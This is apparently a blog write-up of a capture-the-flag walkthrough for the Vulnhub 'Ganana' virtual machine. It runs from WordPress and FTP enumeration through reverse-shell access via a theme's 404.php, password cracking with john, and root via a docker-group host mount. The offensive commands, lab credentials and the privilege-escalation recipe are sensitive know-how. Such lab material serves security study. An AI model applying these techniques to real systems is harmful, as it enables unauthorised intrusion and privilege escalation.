Vulnhub - Ganana

Hi all, i really enjoyed pwning this VM! :)

You can find the machine there > Ganana

Enumeration/Reconnaissance

Let’s start always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
$ ip=192.168.1.11
$ nmap -sC -sV -p- -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-28 14:40 EEST
Nmap scan report for debian.zte.com.cn (192.168.1.11)
Host is up (0.00041s latency).
Not shown: 65531 filtered ports
PORT     STATE  SERVICE  VERSION
22/tcp   closed ssh
80/tcp   open   http     Apache httpd (PHP 7.3.17)
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache
|_http-title: Ganana
443/tcp  open   ssl/http Apache httpd (PHP 7.3.17)
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache
|_http-title: Ganana
| ssl-cert: Subject: commonName=www.example.com/organizationName=Bitnami
| Not valid before: 2020-06-06T10:55:45
|_Not valid after:  2030-06-04T10:55:45
6777/tcp open   ftp      vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.16
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
MAC Address: 08:00:27:A1:34:AB (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix

Let’s check FTP first since we have anonymous allowed.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
$ ftp $ip 6777
Connected to 192.168.1.11.
220 (vsFTPd 3.0.3)
Name (192.168.1.11:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 0        112          4096 Jun 06 12:51 .
drwxr-xr-x    3 0        112          4096 Jun 06 12:51 ..
drwxr-xr-x    2 0        0            4096 Jun 06 12:51 .Welcome
226 Directory send OK.
ftp> cd .Welcome
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jun 06 12:51 .
drwxr-xr-x    3 0        112          4096 Jun 06 12:51 ..
-rw-r--r--    1 0        0              82 Jun 06 12:49 .Note.txt
226 Directory send OK.
ftp> get .Note.txt
local: .Note.txt remote: .Note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .Note.txt (82 bytes).
226 Transfer complete.
82 bytes received in 0.00 secs (90.7915 kB/s)
ftp> exit
221 Goodbye.
$ cat .Note.txt 
Hey Welcome to the ORG!!! Hope you have a wonderfull experence working with US!!!

Useless, let’s check http now, we can see that a wordpress site running there :

1
<meta name="generator" content="WordPress 5.4.2"/>

Let’s run wpscan on it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ wpscan --no-banner --url http://$ip/ --enumerate p
[+] URL: http://192.168.1.11/ [192.168.1.11]
[+] Started: Sun Jun 28 14:47:03 2020

..junk data..

[i] Plugin(s) Identified:

[+] stop-user-enumeration
 | Location: http://192.168.1.11/wp-content/plugins/stop-user-enumeration/
 | Latest Version: 1.3.25 (up to date)
 | Last Updated: 2020-06-24T16:29:00.000Z
 |
 | Found By: Urls In 404 Page (Passive Detection)
 |
 | Version: 1.3.25 (100% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - http://192.168.1.11/wp-content/plugins/stop-user-enumeration/frontend/js/frontend.js?ver=1.3.25
 | Confirmed By:
 |  Readme - Stable Tag (Aggressive Detection)
 |   - http://192.168.1.11/wp-content/plugins/stop-user-enumeration/readme.txt
 |  Readme - ChangeLog Section (Aggressive Detection)
 |   - http://192.168.1.11/wp-content/plugins/stop-user-enumeration/readme.txt

WOW, that means we can’t enumerate users, let’s test it out.

1
2
3
4
5
6
7
8
9
10
$ wpscan --no-banner --url http://$ip/ --enumerate u
[+] URL: http://192.168.1.11/ [192.168.1.11]
[+] Started: Sun Jun 28 14:48:58 2020

..junk data..

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <======================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] No Users Found.

And we cant also visit admin panel. When we visit /wp-admin redirect us to /404 crazy. Let’s run gobuster for further enumeration.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ gobuster dir -q -u http://$ip/ -w /root/Documents/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt -x php,txt,html -o gobuster.txt
/wp-content (Status: 301)
/wp-admin (Status: 301)
/wp-includes (Status: 301)
/logout (Status: 403)
/register (Status: 302)
/feed (Status: 301)
/rss (Status: 301)
/index.php (Status: 301)
/phpmyadmin (Status: 301)
/wp-feed.php (Status: 301)
/dashboard (Status: 302)
/secret (Status: 302)
/0 (Status: 301)
/embed (Status: 301)
/tasks (Status: 200)
/tasks.txt (Status: 200)

Here we go, the interesting stuff :

1
2
3
/phpmyadmin
/secret -> admin panel
/tasks

The most important thing here is the /tasks when we visit it we can see :

1
2
3
4
Hey Jarret Lee!

Do manage the office as the admin is away for a few weeks! 
Admin has created an other temp account for you and details in a pcapng file. 

And we can find the .pcapng file as jarret.pcapng :

1
2
3
$ wget -q http://$ip/jarret.pcapng
$ file jarret.pcapng 
jarret.pcapng: pcapng capture file - version 1.0

Analyzing pcapng file with wireshark

.pcapng -> packet capture file

wireshark -> is a network protocol analyzer

Follow my steps :

Now we can apply filters, because we want to search for plain text credentials on http we will apply this filter :

http.request.method==POST

All the credentials :

1
2
3
4
5
6
7
username : jarretlee
passwords :
1) nopassword
2) jarretlee
3) passwordis jarret
4) jarretLEE
5) NoBrUtEfOrCe__R3Qu1R3d__

wordpress/phpmyadmin exploitation -> shell as www-data

After some tries only the jarretlee:NoBrUtEfOrCe__R3Qu1R3d__ works.

When we login into the panel we can see this post :

Let’s decode it :

1
2
$ echo "QGx3YXlzLUAtU3VwM3ItU2VjdXIzLXBAU1N3MFJkISE" | base64 -d
@lways-@-Sup3r-Secur3-p@SSw0Rd!!

I got stuck here for lot of minutes.. because i totally forgot of phpmyadmin haha silly me :D

phpmyadmin -> for administration of MySQL over the web

We can login in with jarretlee:@lways-@-Sup3r-Secur3-p@SSw0Rd!!

Of course we will focus on wp_users table :

Here we will do a little trick, probably user charleywalker is the admin, let’s change his password. Follow my steps :

We’re in as charleywalker:pwned let’s spawn a reverse shell. Follow my steps :

You can execute the shell now under : http://$ip/wp-content/themes/tsumugi/404.php

1
2
3
4
$ nc -lvp 5555
listening on [any] 5555 ...
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
daemon@debian:/$ 

We can privesc to jarretlee really easy :

1
2
3
4
5
daemon@debian:/$ su - jarretlee
su - jarretlee
Password: NoBrUtEfOrCe__R3Qu1R3d__

jarretlee@debian:~$ 

jarretlee -> jeevan

Under his directory we can see this hidden file :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
jarretlee@debian:~$ ls -la
ls -la
total 32
drwxr-xr-x 3 jarretlee jarretlee 4096 Jun 25 06:25 .
drwxr-xr-x 3       600 root      4096 Jun 17 07:00 ..
-rw------- 1 jarretlee jarretlee  177 Jun 17 07:47 .backups
-rw------- 1 jarretlee jarretlee  515 Jun 25 06:25 .bash_history
-rw-r--r-- 1 jarretlee jarretlee  220 Jun 17 07:00 .bash_logout
-rw-r--r-- 1 jarretlee jarretlee 3526 Jun 17 07:00 .bashrc
drwx------ 3 jarretlee jarretlee 4096 Jun 25 06:25 .gnupg
-rw-r--r-- 1 jarretlee jarretlee  807 Jun 17 07:00 .profile
jarretlee@debian:~$ cat .backups
cat .backups
amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9jRG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6MDo5OTk5OTo3Ojo6

Let’s decode it.

1
2
echo amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9jRG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6MDo5OTk5OTo3Ojo6 | base64 -d
jeevan:$6$LXNakaBRJ/tL5F2a$bCgiylk/LY2MeFp5z9YZyiezsNsgj.5/cDohRgFRBNdrwi/2IPkUO0rqVIM3O8vysc48g3Zpo/sHuo.qwBf4U1:18430:0:99999:7:::

Seems like a copy of /etc/shadow let’s crack it with john.

1
2
3
4
5
6
7
$ john --wordlist=/usr/share/wordlists/rockyou.txt password.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hannahmontana    (?)
1
2
3
4
5
jarretlee@debian:~$ su - jeevan
su - jeevan
Password: hannahmontana

jeevan@debian:/home/jarretlee$ 

jeevan -> root

Now privesc to root is really easy, if we check groups :

1
2
3
jeevan@debian:/home/jarretlee$ id
id
uid=1003(jeevan) gid=1005(jeevan) groups=1005(jeevan),115(docker)

jeevan is in docker group, if user is a member of the docker group we can run this and take root shell :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
jeevan@debian:/home/jarretlee$ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
Unable to find image 'chrisfosterelli/rootplease:latest' locally
latest: Pulling from chrisfosterelli/rootplease
a4a2a29f9ba4: Pull complete 
127c9761dcba: Pull complete 
d13bf203e905: Pull complete 
4039240d2e0b: Pull complete 
16a91ffa6f29: Pull complete 
Digest: sha256:eb6be3ee1f9b2fd6e3ae6d4fda81a80bfdf21aad9bde6f1a5234f1baa58d4bb3
Status: Downloaded newer image for chrisfosterelli/rootplease:latest

You should now have a root shell on the host OS
Press Ctrl-D to exit the docker instance / shell
# whoami;id
whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Let’s grab the flag.

1
2
3
4
5
6
7
8
9
10
# cat /root/root.txt
cat /root/root.txt


                    _       _                 _                              _    
 __ __ __  ___     | |     | |      o O O  __| |    ___    _ _      ___     | |   
 \ V  V / / -_)    | |     | |     o      / _` |   / _ \  | ' \    / -_)    |_|   
  \_/\_/  \___|   _|_|_   _|_|_   TS__[O] \__,_|   \___/  |_||_|   \___|   _(_)_  
_|"""""|_|"""""|_|"""""|_|"""""| {======|_|"""""|_|"""""|_|"""""|_|"""""|_| """ | 
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'./o--000'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 

Lot of fun, we need more VMs like this one! :D